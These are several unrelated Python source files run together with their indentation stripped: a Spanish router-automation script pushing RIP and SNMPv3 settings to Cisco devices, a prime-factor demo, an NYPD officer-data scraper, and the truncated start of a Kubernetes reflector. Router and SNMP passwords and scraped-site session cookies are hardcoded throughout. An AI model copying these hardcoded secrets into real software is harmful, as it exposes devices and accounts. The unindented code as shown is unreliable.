listToStr= listToStr.replace(' YES NVRAM up up \n', ' ')
listToStr= listToStr.replace(' YES manual up up \n', ' ')
listToStr= listToStr.replace(' ', ' ')
tempVar= self.hostname.split('.')
myInterfacesDict= {}
ripRoutes= []
if 'Internet' in listToStr:
fastValueIndex= listToStr.index('Fast')
interfacesList= listToStr[fastValueIndex:listToStr.index('#', fastValueIndex)].split()
internetValueIndex= 0
internetList= []
if 'Internet' in listToStr:
internetValueIndex= listToStr.index('Internet', fastValueIndex)
internetList= listToStr[internetValueIndex:listToStr.index('#', internetValueIndex)].split()
print('Interfaces de internet: ', internetList)
for i in interfacesList:
print('Interfaz: ', i)
if 'Fast' in i:
position= interfacesList.index(i) + 1
actualValue= interfacesList[position]
sub= ""
for int_fa in internetList:
if actualValue in int_fa:
actualValue= int_fa
sub= actualValue.split("/")
pr=sub[1]
sub=list(map(int,sub[0].split(".")))
sub=arr_to_ip(get_id_net(sub,create_masc_by_prefix(int(pr))))
break
myInterfacesDict[i]= actualValue
myInterfacesDict[f"{i}-sub"]= sub
ripRoutes.append(sub)
routers[self.hostname]['Interfaces']= myInterfacesDict
else:
interfacesList= listToStr[listToStr.index('Fast'):].split()
for i in interfacesList:
print('Interfaz: ', i)
if 'Fast' in i:
position= interfacesList.index(i) + 1
actualValue= interfacesList[position]
sub= ""
for int_fa in internetList:
if actualValue in int_fa:
actualValue= int_fa
sub= actualValue.split("/")
pr=sub[1]
sub=list(map(int,sub[0].split(".")))
sub=arr_to_ip(get_id_net(sub,create_masc_by_prefix(int(pr))))
break
myInterfacesDict[i]= actualValue
myInterfacesDict[f"{i}-sub"]= sub
ripRoutes.append(sub)
routers[self.hostname]['Interfaces']= myInterfacesDict
routesToHosts= []
print(f'Del router {self.hostname} se filtrarán las interfaces, válidas de: ')#, myInterfacesDict)
for key,value in myInterfacesDict.items():
#routerAnterior= self.k.split('.')
routerAnterior= value.split('.')
print('Valor a evaluar: ', routerAnterior)
if '' not in routerAnterior and 'unassigned' not in routerAnterior:
routerAnteriorString= routerAnterior[0] + '.' + routerAnterior[1] + '.' + routerAnterior[2] + '.'
foundCoincidence= False
for key2,value2 in routers[self.hostname]['Neighbors'].items():
#print('Checa al vecino: ', key2, ', ', value2)
if routerAnteriorString in value2:
foundCoincidence= True
break
routerAnterior= self.ip_direct.split('.')
routerAnteriorString= routerAnterior[0] + '.' + routerAnterior[1] + '.' + routerAnterior[2] + '.'
#print('Se compara ', routerAnteriorString, ' contra ', value)
if routerAnteriorString in value:
foundCoincidence= True
if foundCoincidence is False and 'sub' not in key:
routesToHosts.append(value)#.split('/')[0])
print('Esta podría ser una direccion válida: ', value.split('/')[0])
#if self.k not in value and self.ip_direct not in value:
print('Para las rutas rip usará las direcciones:')
for i in ripRoutes:
print('RIP route: ', i)
rip(self.net_connect, ripRoutes)
#Muestra cuáles son posibles conexiones a hosts
routers[self.hostname]['RoutesToHosts']= routesToHosts
routers[self.hostname]['Protocol']= 'RIP'
#Si tiene otros routers que se derivan de éste entonces no cerrará la conexión
if self.willUsePredefinedConnection is False:
self.net_connect.disconnect()
else:
tempVar= self.previousRouter.split('.')
print('ROUTER ESPERADO: ', tempVar)
#self.net_connect.send_command('exit', expect_string=r''+self.hostname.split('.')[0]+'(config)#')
self.net_connect.send_command('exit', expect_string=r''+self.previousRouter.split('.')[0]+'#')
#self.net_connect.send_command('exit')
return routers_Code[self.hostname]
class staticConfig:
def __init__(self, ip_direct):
self.ip_direct= ip_direct
def set_data(self, cmd):
self.cmd= cmd
def sendData(self):
#print('Intentará crear la conexión con: ', cisco, ' primer instruccion: ', self.cmd[0])
net_connect = ConnectHandler(**cisco)
#print('Se hizo la conexión')
net_connect.enable()
self.cmd= self.cmd
#print('Conexión hecha con los datos', self.cmd)
output=[]
for i in range(len(self.cmd)):
#print('Comando a anotar: ', self.cmd[i])
output.append(net_connect.send_command_timing(self.cmd[i]))
class configRouter:
def __init__(self, cmd):
self.cmd= cmd
def sendData(self):
#print('Intentará crear la conexión con: ', cisco, ' primer instruccion: ', self.cmd[0])
net_connect = ConnectHandler(**cisco)
#print('Se hizo la conexión')
net_connect.enable()
self.cmd= self.cmd
#print('Conexión hecha con los datos', self.cmd)
print('Direccion que recibe: ', self.cmd[0])
output = net_connect.send_command_timing(f'show cdp entry {self.cmd[0]} | i IP address').split()
print('Datos del output: ', output)
self.cmd[1]= self.cmd[1] + output[2]
output=[]
for i in range(1,len(self.cmd)):
print('Comando a anotar: ', self.cmd[i])
output.append(net_connect.send_command_timing(self.cmd[i]))
return output
def process(routerData):
routerData.sendDataToRouter()
#print('\n\nInfo recuperada: ', routerData.sendDataToRouter(), "\n\n")
def staticProcess(routerData):
routerData.sendData()
#print('\n\nInfo recuperada: ', routerData.sendData(), "\n\n")
def configRouterProcess(routerData):
print('Info recuperada: ', routerData.sendData())
#print('\n\nInfo recuperada: ', routerData.sendData(), "\n\n")
def ospfProcess(routerData):
routerData.sendData()
#print('\n\nInfo recuperada: ', routerData.sendData(), "\n\n")
def rip(con, ips_id):
print('Llegó al rip')
cmd= ['conf t', 'snmp-server view V3Read iso included', 'snmp-server view V3Write iso included',
'snmp-server group redes3 v3 auth read V3Read write V3Write',
'snmp-server user admin redes3 v3 auth sha shapass1234 priv des56 despass1234', 'router rip', 'ver 2']
for i in ips_id:
cmd.append('network ' + i)
cmd.append('exit')
cmd.append('exit')
configTerminal= []
for i in range(len(cmd)):
configTerminal.append(con.send_command_timing(cmd[i]))
print('Primer comando output: ', configTerminal)
time.sleep(1)
def configure_router(router,hostname,con):
#print(f'Intenta ejecutar show cdp entry {router} | i IP address')
output = con.send_command(f'show cdp entry {router} | i IP address')
resp = output.split()
print('Respuesta: ', resp)
con.send_command('ssh -l '+cisco['username']+' '+resp[2],expect_string=r'Password:')
tempVar= router.split('.')
#print('Router a buscar: ', tempVar)
con.send_command(cisco['password'], expect_string=r''+tempVar[0]+'#')
#print('Pasará a configurar RIP')
#rip(con)
neighbors(router, con)
newHostName= hostname.split('.')
#print(f'Se espera al comando: {newHostName[0]}#')
con.send_command('exit',expect_string=newHostName[0]+'#')
return resp[2]
def neighbors(hostname, con):
output = con.send_command('show cdp neighbors detail | i Device ID')
output2 = con.send_command('show cdp neighbors detail | i IP address')
routersOutput = output.split()
addressOutput = output2.split()
print(f'OUTPUT: {routersOutput} y {addressOutput}')
varTempRouters= {}
i = 2
while i < len(routersOutput):
tempRouter= routersOutput[i].split(".")
if tempRouter[0] not in known_routers:
print('ROUTER AGREGADO: ', tempRouter[0])
print(routersOutput[i], ":")
known_routers.append(tempRouter[0])
varTempRouters[routersOutput[i]]= configure_router(routersOutput[i],hostname,con)
else:
varTempRouters[routersOutput[i]]= addressOutput[i]
"""
if tempRouter[0] not in known_routers:
print('ROUTER AGREGADO: ', tempRouter[0])
print(routersOutput[i], ":")
known_routers.append(tempRouter[0])
varTempRouters[routersOutput[i]]= configure_router(routersOutput[i],hostname,con)
else:
varTempRouters[routersOutput[i]]= ''
"""
i = i + 3
neighbors= {}
neighbors['Neighbors']= varTempRouters
routers[hostname]= neighbors
#Aquí se usan los hilos
#print(f'Hilo del router {hostname} iniciado')
#threads.append(Thread(target=rip,args=(con,)))
#threads[-1].start()
def scan_by_interface(interface_name="enp0s9",user="admin",password="admin",secret="1234"):
global cisco
cisco["username"]= user
cisco["password"]= password
cisco["secret"]= secret
# Obtienen el disccionario de los datos de la red
dic_data=ni.ifaddresses(interface_name)
if 2 not in dic_data:
print("No hay una dirección IPv4 en la interfaz")
return [-1,-1]
dic_data=dic_data[2][0]
print(f"\nInformación\n{interface_name}:{dic_data}")
addr=list(map(int,dic_data["addr"].split(".")))
net=list(map(int,dic_data["netmask"].split(".")))
c=determinate_prefix(net)
# Se obtiene el identificador de la subred
idnet=get_id_net(addr,net)
# Se obtiene la dirección de broadcast
range_net=get_broadcast_ip(idnet,net)
print(f"Address: {addr}\nNetmask:{net}\nIdnet\n\tID: {(idnet)}/{c}\n\tNet: {(net)}\n\Range_net: {(range_net)}")
print(f"Red a Escanear\n\tID: {arr_to_ip(idnet)}/{c}\n\tNetmask: {arr_to_ip(net)}\n\tBroadcast: {arr_to_ip(range_net)}")
# Se prepara para hacer is_host_up
ips=[idnet[0],idnet[1],idnet[2],idnet[3]+1]
print('Interfaces: ', ni.gateways())
responde=scan_range(ips,range_net)
# Se filtra por primera vez que solo los elementos que sean Cisco
"""
ciscos=[]
for i in range(len(responde)):
for k,v in responde[i].items():
if "Cisco_Router_IOS" in v:
print("Añadiendo: ", responde[i])
ciscos.append(responde[i])
"""
for k,v in responde[0].items():
print(f"Estableciendo conexión con la dirección: {k}")
cisco['ip'] = k
#print(f"Solo routers cisco: {ciscos}")
# Despues de todo lo que hace el modulo hay que conectarse por ssh o telnet
# a los dispositivos cisco
cmd=["sh cdp neigh detail | i IP address","sh cdp neigh detail | i Device ID","sh run | include hostname",
"sh ip int br | include up", "sh ip int | include Internet address"]
red={}
net_router={}
# Los datos del router (Interfaces)
output=conectar(cisco,cmd)
#dir=re.split("\n| Internet address is | ",output[0])
#inte=re.split("\n| YES NVRAM up up | YES manual up up | ",output[1])
host_cmd= output[2].split("hostname ")[1]
interf= output[3].split()
direcciones= output[4].split()
#print('Interfaces: ', interf, '\nDirecciones: ', direcciones)
myInterfacesDict= {}
ripRoutes= []
for i in interf:
if 'Fast' in i:
position= interf.index(i) + 1
actualValue= interf[position]
sub= ""
for int_fa in direcciones:
if actualValue in int_fa:
actualValue= int_fa
sub= actualValue.split("/")
pr=sub[1]
sub=list(map(int,sub[0].split(".")))
sub=arr_to_ip(get_id_net(sub,create_masc_by_prefix(int(pr))))
break
myInterfacesDict[i]= actualValue
myInterfacesDict[f"{i}-sub"]= sub
ripRoutes.append(sub)
con = ConnectHandler(**cisco)
rip(con, ripRoutes)
con.disconnect()
print('Directorio: ', myInterfacesDict)
print("\n\n\n")
known_routers.append(host_cmd)
val= output[1].split()[2]
host_cmd= val.replace(val.split('.')[0], host_cmd)
print('Router Principal: ', host_cmd)
routers_alreadyConfigured.append(host_cmd)
#Buscará los vecinos
con = ConnectHandler(**cisco)
neighbors(host_cmd, con)
con.disconnect()
tempHost= []
tempHost.append(cisco['ip'] + '/' + str(c))
routers[host_cmd]['Interfaces']= myInterfacesDict
routers[host_cmd]['RoutesToHosts']= tempHost
routers[host_cmd]['Protocol']= 'RIP'
routers[host_cmd]['Ip']= cisco['ip']
json_routers=json.dumps(routers,sort_keys=True,indent=4)
newDict= json.loads(json_routers)
print(f"Diccionario de routers:\n{json_routers}")
cmd=['','ssh -l '+cisco['username']+' ',cisco['password'],'exit']
for key,values in newDict.items():
cmd[0]= key
print('Router elegido: ', key, ' y el cmd dice: ', cmd[0])
break
#cmd=["ssh -l admin ","show cdp neigh detail","admin","ena","1234","sh ip int | i Internet address",
# "sh ip int br | include up","sh run | include hostname","exit"]
cmd=["ssh -l admin ","admin","ena","1234", "sh ip int br | include up", "sh ip int | include Internet address"]#,"exit"]
rawCmd=["","admin","1234", "sh ip int br | include up", "sh ip int | i Internet address"]#, "exit"]
for key, values in newDict[host_cmd]['Neighbors'].items():
print('Elemento dentro: ', values)
global amountOfRouters
amountOfRouters= amountOfRouters + 1
routers_alreadyConfigured.append(key)
router= dataToRouter(values, host_cmd, key, ConnectHandler(**cisco))
router.set_data(cisco['ip'], cmd, rawCmd, False)
threads.append(Thread(target=process,args=(router,)))
threads[-1].start()
#Detener hilos
actualAmountOfThreads= len(threads)
threadCounter= 0
while threadCounter < actualAmountOfThreads:
print('CANTIDAD DE HILOS: ', amountOfRouters)
threads[amountOfRouters - 1 - threadCounter].join()
threadCounter= threadCounter + 1
actualAmountOfThreads= len(threads)
new_datos= json.dumps(routers_Code,sort_keys=True,indent=4)
print(f'Datos: {new_datos}')
new_json_routers=json.dumps(routers,sort_keys=True,indent=4)
print(f"Diccionario de routers:\n{new_json_routers}")
with open('routers.json','w') as outfile:
json.dump(new_json_routers,outfile,indent=4)
#VOY AQUÍ, LO QUE SIGUE ES VER COMO HACER PARA CONECTAR AL HOST DE LA POSIBLE RUTA DE CADA ROUTER
"""
#Primero hay que obtener el identificador de red, esto es pasar /24 a 255.255.255.0 o sus equivalentes
data= routers['R1.adminredes.escom.ipn.mx']['RoutesToHosts'][0]
chosenIp= data[:data.index('/')]
chosenNetMask= data[(data.index('/') + 1):]
print(f'Host a visitar: {chosenIp} con máscara de subred: {chosenNetMask}')
addr= turnIpToArray(chosenIp)
net= determinate_prefix_inverse(int(chosenNetMask))
print(f'\nConvertida en {addr} con máscara {net}')
idnet=get_id_net(addr,net)
# range_net es la dirección de broadcast, esto es para un 10.0.1.1/24 lo torna en 10.0.1.255
range_net=get_broadcast_ip(idnet,net)
#ips viene siendo la dirección 1 de la subred a la que se está conectado, esto es, 10.0.1.0 lo torna en 10.0.1.1
ips=[idnet[0],idnet[1],idnet[2],idnet[3]+1]
responde=look_for_hosts('R1.adminredes.escom.ipn.mx',ips,range_net)
conexiones= verifica_conectividad(routers)
"""
"""
cmd=["sh ip int | i Internet address","sh ip int br | include up","sh run | include hostname"]
c=0
red={}
net_router={}
for i in ciscos:
flag=False
# Los datos del router (Interfaces)
for k,v in i.items():
print(f"Estableciendo conexión con la dirección: {k}")
cisco["ip"]=k
output=conectar(cisco,cmd)
print('Output: ', output)
dir=re.split("\n| Internet address is | ",output[0])
inte=re.split("\n| YES NVRAM up up | YES manual up up | ",output[1])
host_cmd=output[2].split("hostname ")[1]
direcciones=[]
interf=[]
for j in dir:
if j!="":
direcciones.append(j)
for j in inte:
if j!="":
interf.append(j)
if host_cmd in red.keys():
flag=False
else:
flag=True
if flag:
iter={}
for j in range(len(direcciones)):
iter[interf[(j*2)]]=direcciones[j]
sub=direcciones[j].split("/")
pr=sub[1]
sub=list(map(int,sub[0].split(".")))
sub=arr_to_ip(get_id_net(sub,create_masc_by_prefix(int(pr))))
iter[f"{interf[(j*2)]}-sub"]=sub
red[host_cmd]=iter
dir.clear()
inte.clear()
direcciones.clear()
print("\n\n\n")
for i in red.items():
print('Router: ', i, '\n\n')
"""
"""
threads= []
cmd=["ssh -l admin ","admin","ena","1234","sh ip int | i Internet address","sh ip int br | include up","sh run | include hostname","exit"]
# Obtiene los datos de la interfaz y se intenta conectar a la ip-1 a la que esta conectada
for i in ciscos:
for k,v in i.items():
cisco["ip"]=k
for l,m in red.items():
for n,o in m.items():
ip_r=o.split("/")
if ip_r[0]!=k and "-sub" not in n:
ip_r=list(map(int,ip_r[0].split(".")))
ip_r[3]-=1 #Para este caso cambia la ip del gateway, de P_3 de 254 asigna a la otra la 253
ip_r=arr_to_ip(ip_r)
print('IP: ', ip_r)
router= dataToRouter(ip_r)
router.set_data(k, cmd)
threads.append(Thread(target=process,args=(router,)))
threads[-1].start()
#Detener hilos
for t in range(len(threads)):
threads[t].join()
for k,v in re_n.items():
red[k]=v
json_routers=json.dumps(red,sort_keys=True,indent=4)
print(f"Diccionario de routers:\n{json_routers}")
route=[]
protocolsThreads= []
conexiones=verifica_conectividad(red)
# Se realiza las configuraciones de los routers permitiendo redistribución entre protocolos dinamicos y el estatico
for i,j in red.items():
route=[]
if "1" in i:
print(f"\nEnrutamiento estático hacia -> {i}")
for k,v in red.items():
if "1" not in k:
for l,m in v.items():
if "-sub" in l and m not in route and n not in v.values():
route.append(m)
resultado=conexiones[verifica_index(conexiones,i)]
parser=resultado.split(":")
routers=parser[0].split("-")
net=parser[1]
route_c=[]
for k,v in red.items():
if "1" in k:
for l,m in v.items():
if "-sub" in l and m not in route:
route_c.append(m)
route.remove(net)
#print(f"{routers[0]} enruta hacia {routers[1]} con net {route_c}")
#print(f"{routers[1]} enruta hacia {routers[0]} con net {route}")
# Aca desarrollamos el comando en conjunto de las IP's que estan interconectadas
# Obtenemos ip del R[0] hacia que ip salen la redirección de datos de R[1]
ip_r1=list(red[routers[1]].values())
ip=ip_r1.index(net)-1
ip_r1=ip_r1[ip].split("/")[0]
# Obtenemos ip del R[1] hacia que ip salen la redirección de datos de R[0]
ip_r2=list(red[routers[0]].values())
ip=ip_r2.index(net)-1
ip_r2=ip_r2[ip].split("/")[0]
cmd=["conf t"]
for a in route_c:
cmd.append(f"ip route {a} 255.255.255.0 {ip_r1}")
cmd.append("end")
#print(f"{routers[0]} manda comandos hacia si mismo con configuracion= {cmd}")
router= staticConfig(ip_r)
router.set_data(cmd)
protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
protocolsThreads[-1].start()
#output=conectar_bridge(cisco,cmd)
cmd=[f"ssh -l admin {ip_r1}","admin","ena","1234","conf t"]
for a in route:
cmd.append(f"ip route {a} 255.255.255.0 {ip_r2}")
cmd.append("end")
cmd.append("exit")
#print(f"{routers[0]} manda comandos hacia {routers[1]} con configuracion= {cmd}")
router= staticConfig(ip_r2)
router.set_data(cmd)
protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
protocolsThreads[-1].start()
#output=conectar_bridge(cisco,cmd)
elif "2" in i:
print(f"\nEnrutamiento RIP {i}")
resultado=conexiones[verifica_index(conexiones,i)]
parser=resultado.split(":")
routers=parser[0].split("-")
net=parser[1]
print(f"Conexion entre {routers[0]} y {routers[1]} con la ip {net}")
routes_r1=[]
routes_r2=[]
ip_r1=list(red[routers[0]].values())
for i in ip_r1:
if "/" not in i:
routes_r1.append(i)
ip_r1=list(red[routers[1]].values())
for i in ip_r1:
if "/" not in i:
routes_r2.append(i)
cmd=["conf t","router rip","ver 2","redistribute static","redistribute ospf 1","default-metric 1"]
for i in routes_r1:
cmd.append(f"net {i}")
cmd.append("end")
#print(f"{routers[0]} manda comandos hacia si mismo con configuracion= {cmd}")
router= staticConfig(ip_r2)
router.set_data(cmd)
protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
protocolsThreads[-1].start()
#output=conectar_bridge(cisco,cmd)
# Sale la IP R[1]
ip_r1=list(red[routers[1]].values())
ip=ip_r1.index(net)-1
ip_r1=ip_r1[ip].split("/")[0]
#########################
cmd=[f"ssh -l admin {ip_r1}","admin","ena","1234","conf t","router rip","ver 2","redistribute static","redistribute ospf 1","default-metric 1"]
for i in routes_r2:
cmd.append(f"net {i}")
cmd.append("end")
cmd.append("exit")
#print(f"{routers[0]} manda comandos hacia {routers[1]} con configuracion= {cmd}")
router= staticConfig(ip_r1)
router.set_data(cmd)
protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
protocolsThreads[-1].start()
#output=conectar_bridge(cisco,cmd)
elif "3" in i:
print(f"\nEnrutamiento OSPF {i}")
resultado=conexiones[verifica_index(conexiones,i)]
parser=resultado.split(":")
routers=parser[0].split("-")
net=parser[1]
print(f"Conexion entre {routers[0]} y {routers[1]} con la ip {net}")
routes_r1=[]
routes_r2=[]
ip_r1=list(red[routers[0]].values())
for i in ip_r1:
if "/" not in i:
routes_r1.append(i)
ip_r1=list(red[routers[1]].values())
for i in ip_r1:
if "/" not in i:
routes_r2.append(i)
cmd=["conf t","int loop0","ip add 200.0.0.1 255.255.255.255",
"no sh","exit","router ospf 1","ver 2","router ospf 1",
"redistribute static metric 200 subnets",
"redistribute rip metric 200 subnets"]
for i in routes_r1:
cmd.append(f"net {i} 0.0.0.255 area 0")
cmd.append("end")
#print(f"{routers[0]} manda comandos hacia si mismo con configuracion= {cmd}")
router= staticConfig(ip_r1)
router.set_data(cmd)
protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
protocolsThreads[-1].start()
#output=conectar_bridge(cisco,cmd)
# Sale la IP R[1]
ip_r1=list(red[routers[1]].values())
ip=ip_r1.index(net)-1
ip_r1=ip_r1[ip].split("/")[0]
#########################
cmd=[f"ssh -l admin {ip_r1}","admin","ena","1234","conf t",
"int loop0","ip add 200.0.0.2 255.255.255.255",
"no sh","exit","router ospf 2","ver 2","router ospf 2",
"redistribute static metric 200 subnets",
"redistribute rip metric 200 subnets"]
for i in routes_r2:
cmd.append(f"net {i} 0.0.0.255 area 0")
cmd.append("end")
cmd.append("exit")
#print(f"{routers[0]} manda comandos hacia {routers[1]} con configuracion= {cmd}")
router= staticConfig(ip_r1)
router.set_data(cmd)
protocolsThreads.append(Thread(target=staticProcess,args=(router,)))
protocolsThreads[-1].start()
#output=conectar_bridge(cisco,cmd)
for t in range(len(protocolsThreads)):
protocolsThreads[t].join()
"""
print("\nSe han levantado todos los protocolos para comunicarnos entre routers")
return new_json_routers
|
concurrentCalculation.py | import time
import random
from multiprocessing import Process
# This does all of our prime factorization on a given number 'n'
def calculatePrimeFactors(n):
primfac = []
d = 2
while d*d <= n:
while (n % d) == 0:
primfac.append(d) # supposing you want multiple factors repeated
n //= d
d += 1
if n > 1:
primfac.append(n)
return primfac
# We split our workload from one batch of 10,000 calculations
# into 10 batches of 1,000 calculations
def executeProc():
for i in range(1000):
rand = random.randint(20000, 100000000)
print(calculatePrimeFactors(rand))
def main():
print("Starting number crunching")
t0 = time.time()
procs = []
# Here we create our processes and kick them off
for i in range(10):
proc = Process(target=executeProc, args=())
procs.append(proc)
proc.start()
# Again we use the .join() method in order to wait for
# execution to finish for all of our processes
for proc in procs:
proc.join()
t1 = time.time()
totalTime = t1 - t0
# we print out the total execution time for our 10
# procs.
print("Execution Time: {}".format(totalTime))
if __name__ == '__main__':
main() |
savedata.py | """ Download and save officer data from NYPD Online
Example usage:
./savedata
"""
import requests
import os
import json
import six
import threading
import time
tax_id_dict = {}
LIST_URL = 'https://oip.nypdonline.org/api/reports/2/datasource/serverList?aggregate=&filter=&group=&page='
DETAIL_URL = 'https://oip.nypdonline.org/api/reports/'
OFFICER_URL = 'https://oip.nypdonline.org/api/reports/1/datasource/list'
SAVE_DICTIONARY = './data-folders/'
TMP_DIRECTORY = './tmp/'
SAVE_TAX_ID_LIST = 'tax_id_list'
LIST_OF_FILTERS = [2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,2041,2042]
def append_to_tax_id_dict(value_to_append):
if value_to_append in tax_id_dict:
print(" DUPLICATE found"+str(value_to_append))
else:
tax_id_dict[value_to_append] = True
def make_folder(folder_path):
os.mkdir(folder_path)
def query_list_url_get_taxids(page,pageSize):
url = LIST_URL+str(page)+'&pageSize='+str(pageSize)
headers = {'Content-Type': 'application/json','Cookie': 'user=Dl03--EYI2nawt3xnyi8U-zVa8MFSosL8CIh-v9M-9hDSVxFNeD4mkvoH1RVEzBIZkHau5xp57PiqDp6EHzKzHbywKfQ8PzHFAT8bhloKh0zQFqPC1OO1Uxn4QnxfX_N6wmmZbTaGkZQOFgYxcMYfBLv6ZutVAukPV6CzbxzljqdXeYYbQxpG-PXT-Wy1GITH3h1WjwR4oyg21iHzq04Nhykhbf3IkDGWXYIPgmxK8ARs0WtdoYnSOyXNIMvjT99qCKOKA83Idg1a-lLk-8HGV-p3C8ilYPVfGtkY2kJPuN9K_bNOYg7DSm0CPbRShOrg46eRvz-n5pz9oR8jtignx1c49gG4ER-OKxssLQA07_zBT5RaqYt58-r4lMe790i; BNI_persistence=fQZHNVs5szWnatWt8bmuAJzA1b_wBc4-MEyNgCTaFVZXK0PKH-jBaxkrS6oaSZ0Bz_eln6qu8a74Wj0uSvRC7g=='}
r = requests.get(url, headers=headers)
jsonreturn = r.json()
total = jsonreturn['Total']
for returned_value in jsonreturn['Data']:
append_to_tax_id_dict(returned_value['RowValue'])
if (page*pageSize<total):
return query_list_url_get_taxids(page+1,pageSize)
else:
return list(tax_id_dict.keys())
def save_officer_record_to_file_with_tax_id_return_folder_path(tax_id):
data = '{"filters":[{"key":"@TAXID","label":"TAXID","values":["'+str(tax_id)+'"]}]}'
headers = {'Content-Type': 'application/json','Cookie': 'user=Dl03--EYI2nawt3xnyi8U-zVa8MFSosL8CIh-v9M-9hDSVxFNeD4mkvoH1RVEzBIZkHau5xp57PiqDp6EHzKzHbywKfQ8PzHFAT8bhloKh0zQFqPC1OO1Uxn4QnxfX_N6wmmZbTaGkZQOFgYxcMYfBLv6ZutVAukPV6CzbxzljqdXeYYbQxpG-PXT-Wy1GITH3h1WjwR4oyg21iHzq04Nhykhbf3IkDGWXYIPgmxK8ARs0WtdoYnSOyXNIMvjT99qCKOKA83Idg1a-lLk-8HGV-p3C8ilYPVfGtkY2kJPuN9K_bNOYg7DSm0CPbRShOrg46eRvz-n5pz9oR8jtignx1c49gG4ER-OKxssLQA07_zBT5RaqYt58-r4lMe790i; BNI_persistence=fQZHNVs5szWnatWt8bmuAJzA1b_wBc4-MEyNgCTaFVZXK0PKH-jBaxkrS6oaSZ0Bz_eln6qu8a74Wj0uSvRC7g=='}
r = requests.post(OFFICER_URL,data =data, headers=headers)
response_json = r.json()[0]
data_save = response_json['Items']
name = response_json['Label'].strip()
data_save.append({'name':name})
folder_name = tax_id+'_'+name
make_folder(SAVE_DICTIONARY+folder_name)
save_json_to_file(data_save,SAVE_DICTIONARY+folder_name+'/'+folder_name+'_'+'summary')
while threading.active_count() >100:
print("waiting")
time.sleep(10)
for filter_num in LIST_OF_FILTERS:
#p1 = multiprocessing.Process(target=save_officer_detail_record_to_file_with_tax_id_and_filter_number, args=(tax_id,filter_num,folder_name))
t = threading.Thread(target=save_officer_detail_record_to_file_with_tax_id_and_filter_number, args=(tax_id,filter_num,folder_name))
t.start()
#all_processes = [multiprocessing.Process(target=save_officer_detail_record_to_file_with_tax_id_and_filter_number, args=(tax_id,filter_num,folder_name)) for filter_num in LIST_OF_FILTERS]
#for p in all_processes:
# p.start()
#for p in all_processes:
# p.join()
#save_officer_detail_record_to_file_with_tax_id_and_filter_number(tax_id,filter_num,folder_name)
def save_officer_detail_record_to_file_with_tax_id_and_filter_number(tax_id, filter_num,folder_name):
global error_iter
url = DETAIL_URL+str(filter_num)+'/datasource/list'
data = '{"filters":[{"key":"@TAXID","label":"TAXID","values":["'+str(tax_id)+'"]}]}'
headers = {'Content-Type': 'application/json','Cookie': 'user=Dl03--EYI2nawt3xnyi8U-zVa8MFSosL8CIh-v9M-9hDSVxFNeD4mkvoH1RVEzBIZkHau5xp57PiqDp6EHzKzHbywKfQ8PzHFAT8bhloKh0zQFqPC1OO1Uxn4QnxfX_N6wmmZbTaGkZQOFgYxcMYfBLv6ZutVAukPV6CzbxzljqdXeYYbQxpG-PXT-Wy1GITH3h1WjwR4oyg21iHzq04Nhykhbf3IkDGWXYIPgmxK8ARs0WtdoYnSOyXNIMvjT99qCKOKA83Idg1a-lLk-8HGV-p3C8ilYPVfGtkY2kJPuN9K_bNOYg7DSm0CPbRShOrg46eRvz-n5pz9oR8jtignx1c49gG4ER-OKxssLQA07_zBT5RaqYt58-r4lMe790i; BNI_persistence=fQZHNVs5szWnatWt8bmuAJzA1b_wBc4-MEyNgCTaFVZXK0PKH-jBaxkrS6oaSZ0Bz_eln6qu8a74Wj0uSvRC7g=='}
r = requests.post(url,data =data, headers=headers)
response_json = r.json()
if len(response_json)>0:
# save_json_to_file(response_json,SAVE_DICTIONARY+folder_name+'/filter_'+str(filter_num))
save_json_to_file(response_json,folder_name+tax_id+'filter_'+str(filter_num))
else:
print("Tax Id "+tax_id+' missing summary '+str(error_iter))
error_iter = error_iter +1
def save_officer_info_with_list_tax_ids(tax_ids):
i =0
for tax_id in tax_ids:
if i > 1950:
try:
folder_path = save_officer_record_to_file_with_tax_id_return_folder_path(tax_id)
print("i "+str(i))
except:
print("failed i"+str(i))
i=i+1
def save_json_to_file(json_to_save, file_path_to_save):
with open(file_path_to_save, 'w') as filehandle:
json.dump(json_to_save, filehandle)
def save_tax_ids_to_file():
with open(SAVE_TAX_ID_LIST, 'w') as filehandle:
json.dump(list(tax_id_dict.keys()), filehandle)
def load_tax_ids_from_file():
with open(SAVE_TAX_ID_LIST, 'r') as filehandle:
return json.load(filehandle)
def get_folders_in_path(path_to_search):
return os.listdir(path_to_search)
def file_exists(file_to_check):
return False
def temp_iterate():
#iterate through folder
# save filter 1
list_of_folders = get_folders_in_path('./data-folders/')
for officer_folder in list_of_folders:
tax_id = officer_folder.split('_')[0]
while threading.active_count() >100:
print("waiting")
time.sleep(10)
t = threading.Thread(target=save_officer_detail_record_to_file_with_tax_id_and_filter_number, args=(tax_id,9,officer_folder))
t.start()
if __name__ == '__main__':
#query_list_url_get_taxids(1,100)
#save_tax_ids_to_file()
tax_id_list = load_tax_ids_from_file()
save_officer_info_with_list_tax_ids(tax_id_list)
|
reflector.py | # specifically use concurrent.futures for threadsafety
# asyncio Futures cannot be used across threads
import json
import threading
import time
from concurrent.futures import Future
from functools import partial
from kubernetes import config
from kubernetes import watch
from traitlets import Any
from traitlets import Bool
from traitlets import Dict
from traitlets import Int
from traitlets import Unicode
from traitlets.config import LoggingConfigurable
from urllib3.exceptions import ReadTimeoutError
from .clients import shared_client
# This is kubernetes client implementation specific, but we need to know
# whether it was a network or watch timeout.
class ResourceReflector(LoggingConfigurable):
"""Base class for keeping a local up-to-date copy of a set of
kubernetes resources.
Must be subclassed once per kind of resource that needs watching.
"""
labels = Dict(
{},
config=True,
help="""
Labels to reflect onto local cache
""",
)
fields = Dict(
{},
config=True,
help="""
Fields to restrict the reflected objects
""",
)
resources = Dict(
{},
help="""
Dictionary of resource names to the appropriate resource objects.
This can be accessed across threads safely.
""",
)
kind = Unicode(
'resource',
help="""
Human readable name for kind of object we're watching for.
Used for diagnostic messages.
""",
)
omit_namespace = Bool(
False,
config=True,
help="""
Set this to true if the reflector is to operate across
multiple namespaces.
""",
)
namespace = Unicode(
None,
allow_none=True,
help="""
Namespace to watch for resources in; leave at 'None' for
multi-namespace reflectors.
""",
)
list_method_name = Unicode(
"",
help="""
Name of function (on apigroup respresented by
`api_group_name`) that is to be called to list resources.
This will be passed a a label selector.
